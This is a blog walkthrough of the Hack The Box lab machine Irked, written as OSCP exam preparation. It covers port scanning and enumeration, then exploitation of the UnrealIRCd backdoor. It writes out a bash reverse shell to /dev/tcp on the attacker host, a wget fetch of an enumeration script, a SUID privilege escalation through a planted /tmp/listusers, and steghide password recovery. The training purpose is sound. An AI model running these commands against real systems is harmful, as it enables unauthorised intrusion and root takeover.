Hack The Box: Irked Write-up (#16)

This is my 16th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. Most of the write-up I get help from watching Ippsec’s YouTube videos and reading Rana Khalil’s write-ups. Please feel free to check them out. So let’s begin.

Reconnaissance

As usual, run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.117

• -sC: Default Nmap script
• -sV: Service/version info
• -O: Enable OS detection
• -oA: Output scan results in 3 different formats
• -p-: Scan all ports from 1–65535

We get the back the following result:

• Port 22: — Running SSH service, OpenSSH 6.7p1 Debian
• Port 80: — Running HTTP service, Apache httpd 2.4.10 ((Debian))
• Port 111,37594: — Running rpcbind service
• Port 6697, 8067,65534: — Running IRC service

Nmap scan report for ip-10-10-10-117.ap-southeast-1.compute.internal (10.10.10.117)
Host is up (0.0084s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33428/udp   status
|   100024  1          37594/tcp   status
|   100024  1          44737/tcp6  status
|_  100024  1          49480/udp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
37594/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

For UDP scan, I scanned for top100 ports with “ — top-ports” flag because I already rooted this box while full UDP scan was still running.

nmap -sU -O --top-ports=100 -oA nmap/udp-top100 10.10.10.88

• -sU: UDP scan

We get back the following results.

• Port 111: — Running rpcbind service
• Port 5353: — Running zeroconf

map scan report for ip-10-10-10-117.ap-southeast-1.compute.internal (10.10.10.117)
Host is up (0.0093s latency).
Not shown: 90 closed ports
PORT      STATE         SERVICE
111/udp   open          rpcbind
631/udp   open|filtered ipp
1025/udp  open|filtered blackjack
1028/udp  open|filtered ms-lsa
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
5353/udp  open          zeroconf
17185/udp open|filtered wdbrpc
49186/udp open|filtered unknown
49201/udp open|filtered unknown
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

Before we begin enumeration, let’s do quick mental notes:

1. Port 22, OpenSSH 6.7p1 and port 111 rpcbind services don’t seem to be promising.
2. Port 6697,8067 and 65534 are running UnrealIRCd. A quick Google search for this service reveals unrealircd version 3.2.8.1 is vulnerable to a backdoor. We are not sure the version in this box, but we can enumerate to confirm this.

Service Enumeration

Port 80 (HTTP)

Visit the page.

Just an image. Check the page source.

Nothing interesting here. Let’s run a dirsearch.

python3 /opt/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.117/ -e txt -x 404,403

We get back the following results.

...SNIP...
Output File: /opt/dirsearch/reports/10.10.10.117/20-08-31_15-45-19
[15:45:19] Starting: 
[15:45:19] 200 -   72B  - /
[15:45:20] 301 -  313B  - /manual  ->  http://10.10.10.117/manual/
                                                                                                                           
Task Completed

Let’s visit /manual/.

It is just an index page.

Port 6697,8067 and 65534 (UnrealIRCd)

Let’s run Nmap script to find which port is vulnerable to the backdoor.

nmap --script=irc-unrealircd-backdoor -p6697,8067,65534 10.10.10.117

We get back the following results.

Port 6697 and 8067 are vulnerable to a backdoor. Nmap site has provided steps to test backdoor vulnerability using the same script. Let’s test it out in the next phase.

Exploitation

We try test port 6697. First set a Netcat listener in our Kali Linux.

root@kali:~# nc -nlvp 53
listening on [any] 53 ...

Then run the Nmap script with the following command.

nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='bash -c "bash -i >& /dev/tcp/10.10.14.10/53 0>&1"' 10.10.10.117

We get a reverse shell.

Let’s upgrade the shell to fully interactive shell with python.

python -c 'import pty;pty.spawn("/bin/bash")'

Then press CTRL+Z in your keyboard. After that type the following command.

stty raw -echo;fg

And press Enter key twice. Next, we set the env variable TERM to xterm that helps to clear the screen with the following command.

export TERM=xterm

Press enter. Let’s move to post-enumeration.

Post-Exploitation Enumeration

Let’s find the user.txt file.

ircd@irked:~/Unreal3.2$ find / -name user.txt -type f 2>/dev/null
/home/djmardov/Documents/user.txt
ircd@irked:~/Unreal3.2$ ls -l /home/djmardov/Documents/user.txt
-rw------- 1 djmardov djmardov 33 May 15  2018 /home/djmardov/Documents/user.txt

The file is under djmardov home directory and only he can read it. So we need to escalate privilege.

Let’s download and run lse.sh script in the target machine. First set a python web server where your lse.sh script resides.

root@kali:/opt/LinEnum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

From the target machine, download the file.

ircd@irked:/tmp$ wget http://10.10.14.10/lse.sh
--2020-08-31 07:31:51--  http://10.10.14.10/lse.sh
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘lse.sh’
lse.sh          100%[=====================>]  45.54K  --.-KB/s   in 0.02s
2020-08-31 07:31:51 (2.67 MB/s) - ‘lse.sh’ saved [46631/46631]

Execute the script.

bash lse.sh -l 1 -i

• -l: Level of details
• -i: Non-interactive mode

After reviewing the long output from the script, we noticed the following file which has SUID bit is on.

Let’s check the file type.

ircd@irked:/tmp$ file /usr/bin/viewuser 
/usr/bin/viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped

The file type is binary. Let’s run and see what it does.

ircd@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-08-31 02:20 (:0)
sh: 1: /tmp/listusers: not found

It seems like to looking for listusers file under /tmp but it’s not there. Let’ analyse this binary file with ltrace command in our Kali Linux to understand more.

Conver the file into base64 format.

base64 -w0 /usr/bin/viewer

Copy the output and saved in a file in Kali Linux.

Then decode it back to viewer binary file type with executable permission.

cat base64.txt | base64 -d > viewer; chmod +x viewer

Analyse with ltrace command.

root@kali:/htb/Irked# ltrace ./viewuser 
__libc_start_main(0x565da57d, 1, 0xffaaad84, 0x565da600 <unfinished ...>
puts("This application is being devleo"...This application is being devleoped to set and test user permissions
)                               = 69
puts("It is still being actively devel"...It is still being actively developed
)                               = 37
system("who"joshuaspy :0           2020-08-28 10:04 (:0)
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                    = 0
setuid(0)                                                                 = 0
system("/tmp/listusers"sh: 1: /tmp/listusers: not found
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                    = 32512
+++ exited (status 0) +++

It seems like setuid set to 0 which is a root privilege and then system command try to read the listusers file under /tmp directory but it failed because the file is not there. Great! We can create our payload and place it under /tmp directory.

Privilege Escalation

Let’s create a listusers shell script with the following contents.

root@irked:/tmp# cat listusers 
#!/bin/bash
bash

Give execute permission.

chmod +x listusers

Then run the viewuser binary.

We are rooted.

Grab the user.txt flag.

Grab the root.txt flag.

Extra Contents

I learned another approach to escalate privilege to dfmardov from Ippsec video on this box. It is through steganography method. There is .backup file under /home/djmardov/Documents/ directory.

The password “UPupDOWNdownLRlrBAbaSSss” is used to extract the message or data hidden in the image file. In this case, the image file is irked.jpg. First, install the Steganography program in Kali Linux.

apt install steghide

Next, download the image file to Kali Linux.

wget http://10.10.10.117/irked.jpg

Run the tool to get the hidden message.

steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss

We get the hidden message which is djmardov’s ssh password.

Let’s ssh to this target with user djmardov.

ssh djmardov@10.10.10.117

Now we have dfmardov privilege. From here we can escalate our privilege to root by exploiting SUID misconfiguration we did earlier.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Friendzone.